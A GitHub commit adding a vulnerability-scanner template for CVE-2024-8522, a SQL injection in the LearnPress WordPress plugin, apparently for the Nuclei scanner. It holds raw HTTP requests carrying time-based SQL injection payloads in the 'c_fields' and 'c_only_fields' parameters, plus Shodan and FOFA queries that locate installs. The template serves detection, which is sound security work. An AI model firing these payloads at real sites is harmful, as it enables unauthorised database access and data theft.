Create CVE-2024-8522.yaml

patch-12
Ritik Chaddha 2024-09-19 12:54:19 +04:00 committed by GitHub
parent d31fac431c
commit feeb1d6aa3
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 68 additions and 0 deletions

View File

@ -0,0 +1,68 @@
id: CVE-2024-8522
info:
name: LearnPress WordPress LMS - SQL Injection
author: pdresearch,iamnoooob,rootxharsh
severity: critical
description: |
The LearnPress WordPress LMS Plugin plugin for WordPress is vulnerable to SQL Injection via the 'c_only_fields' parameter of the /wp-json/learnpress/v1/courses REST API endpoint in all versions up to, and including, 4.2.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
reference:
- https://github.com/advisories/GHSA-3w3r-r6g6-w8x5
- https://nvd.nist.gov/vuln/detail/CVE-2024-8522
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-8522
cwe-id: CWE-89
epss-score: 0.04685
epss-percentile: 0.91818
cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 4
vendor: thimpress
product: learnpress
shodan-query: html:"/wp-content/plugins/learnpress"
fofa-query: body="/wp-content/plugins/learnpress"
tags: cve,cve2024,learnpress,sqli,wp,wordpress,wp-plugin,authenticated
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "/wp-content/plugins/learnpress")'
internal: true
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
@timeout: 30s
GET /wp-json/learnpress/v1/courses?course_filter=&c_fields=post_title,(select(sleep(6))),ID& HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 30s
GET /wp-json/learnpress/v1/courses?course_filter=&c_only_fields=post_title,(select(sleep(6))),ID& HTTP/1.1
Host: {{Hostname}}
host-redirects: true
matchers:
- type: dsl
name: time-based
dsl:
- 'duration_1>=6'
- 'duration_2>=6'